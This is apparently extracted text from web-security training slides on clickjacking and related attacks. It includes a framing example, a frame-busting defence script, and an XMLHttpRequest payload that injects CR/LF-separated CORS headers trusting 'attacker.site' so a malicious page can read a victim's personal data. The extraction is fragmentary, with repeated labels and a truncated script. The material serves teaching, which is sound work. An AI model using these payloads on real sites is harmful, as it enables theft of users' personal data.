Other Attacks
Other Attacks
Clickjacking
Share
Feasibility study
<html>
<body>
<frame src="[TargetPage]"> </frame>
<body>
</html>
In our previous scenario, the attacker web page will look like
the original one. The attacker can now insert any transparent
object above the page and lure the victim to click on any
"visible" element in the page.
The image in the next slide shows what happens.
This time we
have set the
opacity of the
button to 0.2,
so you can spot
the difference.
<script>
if(top != window) {
top.location = window.location
}
</script>
Example 1 Example 2
www.attackersite.foo www.voteforthecom
panyoftheyear.foo
iframe
/company?eLSFoo
clickjacking.html
www.attackersite.foo www.voteforthecom
panyoftheyear.foo
iframe
/company?eLSFoo
clickjacking.html
xmlhttp.open("GET","http://target.site/getPersonalData.php?trackingUrl=test%0d%0aAcces
s-Control-Allow-Origin:%20http://attacker.site%0d%0aAccess-Control-Allow-
Credentials:%20true",true);
xmlhttp.send();
}</script>
So, the malicious page can access (and steal) all the victim’s
personal data.
<?php
header(“Location: elsfoo.com”);
die();
?>